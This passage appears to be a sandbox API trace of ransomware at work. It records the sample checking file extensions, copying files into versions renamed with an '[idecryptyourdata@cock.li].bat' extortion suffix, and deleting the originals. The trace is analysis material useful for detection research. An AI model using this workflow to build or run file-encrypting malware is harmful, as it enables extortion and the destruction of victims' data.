[0178.628] lstrlenW (lpString=".bz2") returned 4 [0178.628] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0178.628] lstrlenW (lpString=".7z") returned 3 [0178.628] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0178.628] lstrlenW (lpString="C:\\Boot\\hu-HU\\memtest.exe.mui") returned 29 [0178.628] lstrlenW (lpString=".dbf") returned 4 [0178.628] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0178.628] lstrlenW (lpString="C:\\Boot\\hu-HU\\memtest.exe.mui") returned 29 [0178.628] lstrlenW (lpString=".1cd") returned 4 [0178.628] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0178.628] lstrlenW (lpString="C:\\Boot\\hu-HU\\memtest.exe.mui") returned 29 [0178.628] lstrlenW (lpString=".jpg") returned 4 [0178.628] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0178.629] lstrcmpiW (lpString1=".mui", lpString2=".bat") returned 1 [0178.629] lstrlenW (lpString="bootmgr.exe.mui") returned 15 [0178.629] CreateFileW (lpFileName="C:\\Boot\\it-IT\\bootmgr.exe.mui" (normalized: "c:\\boot\\it-it\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x348 [0178.629] GetFileSizeEx (in: hFile=0x348, lpFileSize=0x361ff14 | out: lpFileSize=0x361ff14*=77144) returned 1 [0178.629] CloseHandle (hObject=0x348) returned 1 [0178.629] GetFileAttributesW (lpFileName="C:\\Boot\\it-IT\\bootmgr.exe.mui" (normalized: "c:\\boot\\it-it\\bootmgr.exe.mui")) returned 0x20 [0178.629] GetFileAttributesW (lpFileName="C:\\Boot\\it-IT\\bootmgr.exe.mui.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\boot\\it-it\\bootmgr.exe.mui.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0178.629] CreateFileW (lpFileName="C:\\Boot\\it-IT\\bootmgr.exe.mui" (normalized: "c:\\boot\\it-it\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0178.629] lstrlenW (lpString="C:\\Boot\\it-IT\\bootmgr.exe.mui") returned 29 [0178.629] lstrlenW (lpString="C:\\Boot\\it-IT\\bootmgr.exe.mui") returned 29 [0178.629] lstrlenW (lpString=".doc") returned 4 [0178.629] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0178.630] lstrlenW (lpString=".docx") returned 5 [0178.630] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0178.630] lstrlenW (lpString=".pdf") returned 4 [0178.630] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0178.630] lstrlenW (lpString=".xls") returned 4 [0178.630] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0178.630] lstrlenW (lpString=".xlsx") returned 5 [0178.630] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0178.630] lstrlenW (lpString=".ppt") returned 4 [0178.630] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0178.630] lstrlenW (lpString="C:\\Boot\\it-IT\\bootmgr.exe.mui") returned 29 [0178.630] lstrlenW (lpString=".zip") returned 4 [0178.630] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0178.630] lstrlenW (lpString=".rar") returned 4 [0178.630] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0178.630] lstrlenW (lpString=".bz2") returned 4 [0178.630] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0178.630] lstrlenW (lpString=".7z") returned 3 [0178.630] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0178.630] lstrlenW (lpString="C:\\Boot\\it-IT\\bootmgr.exe.mui") returned 29 [0178.630] lstrlenW (lpString=".dbf") returned 4 [0178.630] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0178.630] lstrlenW (lpString="C:\\Boot\\it-IT\\bootmgr.exe.mui") returned 29 [0178.630] lstrlenW (lpString=".1cd") returned 4 [0178.630] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0178.630] lstrlenW (lpString="C:\\Boot\\it-IT\\bootmgr.exe.mui") returned 29 [0178.630] lstrlenW (lpString=".jpg") returned 4 [0178.630] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0178.631] lstrlenW (lpString="C:\\Boot\\it-IT\\bootmgr.exe.mui") returned 29 [0178.631] lstrlenW (lpString="C:\\Boot\\it-IT\\bootmgr.exe.mui") returned 29 [0178.631] lstrlenW (lpString=".doc") returned 4 [0178.631] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0178.631] lstrlenW (lpString=".docx") returned 5 [0178.631] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0178.631] lstrlenW (lpString=".pdf") returned 4 [0178.631] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0178.631] lstrlenW (lpString=".xls") returned 4 [0178.631] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0178.631] lstrlenW (lpString=".xlsx") returned 5 [0178.631] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0178.631] lstrlenW (lpString=".ppt") returned 4 [0178.631] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0178.631] lstrlenW (lpString="C:\\Boot\\it-IT\\bootmgr.exe.mui") returned 29 [0178.631] lstrlenW (lpString=".zip") returned 4 [0178.631] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0178.631] lstrlenW (lpString=".rar") returned 4 [0178.631] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0178.631] lstrlenW (lpString=".bz2") returned 4 [0178.631] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0178.631] lstrlenW (lpString=".7z") returned 3 [0178.631] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0178.631] lstrlenW (lpString="C:\\Boot\\it-IT\\bootmgr.exe.mui") returned 29 [0178.631] lstrlenW (lpString=".dbf") returned 4 [0178.631] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0178.632] lstrlenW (lpString="C:\\Boot\\it-IT\\bootmgr.exe.mui") returned 29 [0178.632] lstrlenW (lpString=".1cd") returned 4 [0178.632] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0178.632] lstrlenW (lpString="C:\\Boot\\it-IT\\bootmgr.exe.mui") returned 29 [0178.632] lstrlenW (lpString=".jpg") returned 4 [0178.632] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0178.632] lstrcmpiW (lpString1=".mui", lpString2=".bat") returned 1 [0178.632] lstrlenW (lpString="memtest.exe.mui") returned 15 [0178.632] CreateFileW (lpFileName="C:\\Boot\\it-IT\\memtest.exe.mui" (normalized: "c:\\boot\\it-it\\memtest.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x348 [0178.632] GetFileSizeEx (in: hFile=0x348, lpFileSize=0x361ff14 | out: lpFileSize=0x361ff14*=45472) returned 1 [0178.632] CloseHandle (hObject=0x348) returned 1 [0178.632] GetFileAttributesW (lpFileName="C:\\Boot\\it-IT\\memtest.exe.mui" (normalized: "c:\\boot\\it-it\\memtest.exe.mui")) returned 0x20 [0178.633] GetFileAttributesW (lpFileName="C:\\Boot\\it-IT\\memtest.exe.mui.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\boot\\it-it\\memtest.exe.mui.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0178.633] CreateFileW (lpFileName="C:\\Boot\\it-IT\\memtest.exe.mui" (normalized: "c:\\boot\\it-it\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0178.633] lstrlenW (lpString="C:\\Boot\\it-IT\\memtest.exe.mui") returned 29 [0178.633] lstrlenW (lpString="C:\\Boot\\it-IT\\memtest.exe.mui") returned 29 [0178.633] lstrlenW (lpString=".doc") returned 4 [0178.633] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0178.633] lstrlenW (lpString=".docx") returned 5 [0178.633] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0178.633] lstrlenW (lpString=".pdf") returned 4 [0178.633] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0178.633] lstrlenW (lpString=".xls") returned 4 [0178.633] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0178.633] lstrlenW (lpString=".xlsx") returned 5 [0178.633] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0178.633] lstrlenW (lpString=".ppt") returned 4 [0178.633] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0178.633] lstrlenW (lpString="C:\\Boot\\it-IT\\memtest.exe.mui") returned 29 [0178.633] lstrlenW (lpString=".zip") returned 4 [0178.633] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0178.633] lstrlenW (lpString=".rar") returned 4 [0178.634] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0178.634] lstrlenW (lpString=".bz2") returned 4 [0178.634] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0178.634] lstrlenW (lpString=".7z") returned 3 [0178.634] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0178.642] SetFileAttributesW (lpFileName="C:\\bootmgr", dwFileAttributes=0x26) returned 0 [0178.642] CreateFileW (lpFileName="C:\\bootmgr" (normalized: "c:\\bootmgr"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0178.666] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x361fec0 | out: lpNewFilePointer=0x0) returned 1 [0178.666] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x361fec0 | out: lpNewFilePointer=0x0) returned 1 [0178.666] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-locale-l1-1-0.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-locale-l1-1-0.dll.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x34c [0178.666] GetLastError () returned 0x0 [0178.667] ReadFile (in: hFile=0x348, lpBuffer=0x4049020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x361fecc, lpOverlapped=0x0 | out: lpBuffer=0x4049020*, lpNumberOfBytesRead=0x361fecc*=0x4ac0, lpOverlapped=0x0) returned 1 [0179.162] WriteFile (in: hFile=0x34c, lpBuffer=0x4049020*, nNumberOfBytesToWrite=0x4ad0, lpNumberOfBytesWritten=0x361fc94, lpOverlapped=0x0 | out: lpBuffer=0x4049020*, lpNumberOfBytesWritten=0x361fc94*=0x4ad0, lpOverlapped=0x0) returned 1 [0179.163] ReadFile (in: hFile=0x348, lpBuffer=0x4049020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x361fecc, lpOverlapped=0x0 | out: lpBuffer=0x4049020*, lpNumberOfBytesRead=0x361fecc*=0x0, lpOverlapped=0x0) returned 1 [0179.163] WriteFile (in: hFile=0x34c, lpBuffer=0x4049020*, nNumberOfBytesToWrite=0x114, lpNumberOfBytesWritten=0x361fc94, lpOverlapped=0x0 | out: lpBuffer=0x4049020*, lpNumberOfBytesWritten=0x361fc94*=0x114, lpOverlapped=0x0) returned 1 [0179.163] SetEndOfFile (hFile=0x34c) returned 1 [0179.164] CloseHandle (hObject=0x34c) returned 1 [0179.164] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x361fec0 | out: lpNewFilePointer=0x0) returned 1 [0179.164] SetEndOfFile (hFile=0x348) returned 1 [0179.165] CloseHandle (hObject=0x348) returned 1 [0179.165] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-locale-l1-1-0.dll.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0179.165] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-locale-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-locale-l1-1-0.dll")) returned 1 [0179.166] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-locale-l1-1-0.dll") returned 90 [0179.166] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-locale-l1-1-0.dll") returned 90 [0179.166] lstrlenW (lpString=".doc") returned 4 [0179.166] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0179.166] lstrlenW (lpString=".docx") returned 5 [0179.166] lstrcmpiW (lpString1=".docx", lpString2="0.dll") returned -1 [0179.166] lstrlenW (lpString=".pdf") returned 4 [0179.166] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0179.166] lstrlenW (lpString=".xls") returned 4 [0179.166] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0179.166] lstrlenW (lpString=".xlsx") returned 5 [0179.166] lstrcmpiW (lpString1=".xlsx", lpString2="0.dll") returned -1 [0179.166] lstrlenW (lpString=".ppt") returned 4 [0179.166] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0179.166] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-locale-l1-1-0.dll") returned 90 [0179.166] lstrlenW (lpString=".zip") returned 4 [0179.166] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0179.166] lstrlenW (lpString=".rar") returned 4 [0179.166] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0179.166] lstrlenW (lpString=".bz2") returned 4 [0179.166] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0179.166] lstrlenW (lpString=".7z") returned 3 [0179.166] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0179.167] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-locale-l1-1-0.dll") returned 90 [0179.167] lstrlenW (lpString=".dbf") returned 4 [0179.167] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0179.167] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-locale-l1-1-0.dll") returned 90 [0179.167] lstrlenW (lpString=".1cd") returned 4 [0179.167] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0179.167] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-locale-l1-1-0.dll") returned 90 [0179.167] lstrlenW (lpString=".jpg") returned 4 [0179.167] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0179.167] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-locale-l1-1-0.dll") returned 90 [0179.167] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-locale-l1-1-0.dll") returned 90 [0179.167] lstrlenW (lpString=".doc") returned 4 [0179.167] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0179.167] lstrlenW (lpString=".docx") returned 5 [0179.167] lstrcmpiW (lpString1=".docx", lpString2="0.dll") returned -1 [0179.167] lstrlenW (lpString=".pdf") returned 4 [0179.167] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0179.167] lstrlenW (lpString=".xls") returned 4 [0179.167] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0179.167] lstrlenW (lpString=".xlsx") returned 5 [0179.167] lstrcmpiW (lpString1=".xlsx", lpString2="0.dll") returned -1 [0179.167] lstrlenW (lpString=".ppt") returned 4 [0179.167] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0179.167] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-locale-l1-1-0.dll") returned 90 [0179.167] lstrlenW (lpString=".zip") returned 4 [0179.167] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0179.167] lstrlenW (lpString=".rar") returned 4 [0179.167] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0179.168] lstrlenW (lpString=".bz2") returned 4 [0179.168] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0179.168] lstrlenW (lpString=".7z") returned 3 [0179.168] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0179.168] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-locale-l1-1-0.dll") returned 90 [0179.168] lstrlenW (lpString=".dbf") returned 4 [0179.168] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0179.168] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-locale-l1-1-0.dll") returned 90 [0179.168] lstrlenW (lpString=".1cd") returned 4 [0179.168] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0179.168] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-locale-l1-1-0.dll") returned 90 [0179.168] lstrlenW (lpString=".jpg") returned 4 [0179.168] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0179.168] lstrcmpiW (lpString1=".dll", lpString2=".bat") returned 1 [0179.168] lstrlenW (lpString="AppvIsvStream64.dll") returned 19 [0179.168] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvStream64.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvstream64.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x348 [0179.169] GetFileSizeEx (in: hFile=0x348, lpFileSize=0x361ff14 | out: lpFileSize=0x361ff14*=473760) returned 1 [0179.169] CloseHandle (hObject=0x348) returned 1 [0179.169] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvStream64.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvstream64.dll")) returned 0x20 [0179.169] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvStream64.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvstream64.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0179.169] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvStream64.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvstream64.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0179.169] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvStream64.dll") returned 77 [0179.169] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvStream64.dll") returned 77 [0179.169] lstrlenW (lpString=".doc") returned 4 [0179.169] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0179.169] lstrlenW (lpString=".docx") returned 5 [0179.169] lstrcmpiW (lpString1=".docx", lpString2="4.dll") returned -1 [0179.169] lstrlenW (lpString=".pdf") returned 4 [0179.169] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0179.170] lstrlenW (lpString=".xls") returned 4 [0179.170] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0179.170] lstrlenW (lpString=".xlsx") returned 5 [0179.170] lstrcmpiW (lpString1=".xlsx", lpString2="4.dll") returned -1 [0179.170] lstrlenW (lpString=".ppt") returned 4 [0179.170] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0179.170] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvStream64.dll") returned 77 [0179.170] lstrlenW (lpString=".zip") returned 4 [0179.170] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0179.170] lstrlenW (lpString=".rar") returned 4 [0179.170] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0179.170] lstrlenW (lpString=".bz2") returned 4 [0179.170] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0179.170] lstrlenW (lpString=".7z") returned 3 [0179.170] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0179.170] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvStream64.dll") returned 77 [0179.170] lstrlenW (lpString=".dbf") returned 4 [0179.170] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0179.170] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvStream64.dll") returned 77 [0179.170] lstrlenW (lpString=".1cd") returned 4 [0179.170] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0179.170] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvStream64.dll") returned 77 [0179.170] lstrlenW (lpString=".jpg") returned 4 [0179.170] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0179.170] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvStream64.dll") returned 77 [0179.170] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvStream64.dll") returned 77 [0179.170] lstrlenW (lpString=".doc") returned 4 [0179.171] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0179.171] lstrlenW (lpString=".docx") returned 5 [0179.171] lstrcmpiW (lpString1=".docx", lpString2="4.dll") returned -1 [0179.171] lstrlenW (lpString=".pdf") returned 4 [0179.171] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0179.171] lstrlenW (lpString=".xls") returned 4 [0179.171] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0179.171] lstrlenW (lpString=".xlsx") returned 5 [0179.171] lstrcmpiW (lpString1=".xlsx", lpString2="4.dll") returned -1 [0179.171] lstrlenW (lpString=".ppt") returned 4 [0179.171] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0179.171] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvStream64.dll") returned 77 [0179.171] lstrlenW (lpString=".zip") returned 4 [0179.171] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0179.171] lstrlenW (lpString=".rar") returned 4 [0179.171] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0179.171] lstrlenW (lpString=".bz2") returned 4 [0179.171] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0179.171] lstrlenW (lpString=".7z") returned 3 [0179.171] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0179.171] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvStream64.dll") returned 77 [0179.171] lstrlenW (lpString=".dbf") returned 4 [0179.171] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0179.171] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvStream64.dll") returned 77 [0179.171] lstrlenW (lpString=".1cd") returned 4 [0179.171] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0179.171] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvStream64.dll") returned 77 [0179.171] lstrlenW (lpString=".jpg") returned 4 [0179.171] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0179.172] lstrcmpiW (lpString1=".dll", lpString2=".bat") returned 1 [0179.172] lstrlenW (lpString="AppVIsvStreamingManager.dll") returned 27 [0179.172] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVIsvStreamingManager.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvstreamingmanager.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x348 [0179.172] GetFileSizeEx (in: hFile=0x348, lpFileSize=0x361ff14 | out: lpFileSize=0x361ff14*=210648) returned 1 [0179.172] CloseHandle (hObject=0x348) returned 1 [0179.172] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVIsvStreamingManager.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvstreamingmanager.dll")) returned 0x20 [0179.172] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVIsvStreamingManager.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvstreamingmanager.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0179.173] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVIsvStreamingManager.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvstreamingmanager.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0179.173] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVIsvStreamingManager.dll") returned 85 [0179.173] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVIsvStreamingManager.dll") returned 85 [0179.173] lstrlenW (lpString=".doc") returned 4 [0179.173] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0179.173] lstrlenW (lpString=".docx") returned 5 [0179.173] lstrcmpiW (lpString1=".docx", lpString2="r.dll") returned -1 [0179.173] lstrlenW (lpString=".pdf") returned 4 [0179.173] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0179.173] lstrlenW (lpString=".xls") returned 4 [0179.173] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0179.173] lstrlenW (lpString=".xlsx") returned 5 [0179.173] lstrcmpiW (lpString1=".xlsx", lpString2="r.dll") returned -1 [0179.173] lstrlenW (lpString=".ppt") returned 4 [0179.173] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0179.173] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVIsvStreamingManager.dll") returned 85 [0179.173] lstrlenW (lpString=".zip") returned 4 [0179.173] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0179.173] lstrlenW (lpString=".rar") returned 4 [0179.173] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0179.173] lstrlenW (lpString=".bz2") returned 4 [0179.173] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0179.173] lstrlenW (lpString=".7z") returned 3 [0179.174] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0179.174] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVIsvStreamingManager.dll") returned 85 [0179.174] lstrlenW (lpString=".dbf") returned 4 [0179.174] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0179.174] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVIsvStreamingManager.dll") returned 85 [0179.174] lstrlenW (lpString=".1cd") returned 4 [0179.174] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0179.174] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVIsvStreamingManager.dll") returned 85 [0179.174] lstrlenW (lpString=".jpg") returned 4 [0179.175] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0179.175] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVIsvStreamingManager.dll") returned 85 [0179.175] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVIsvStreamingManager.dll") 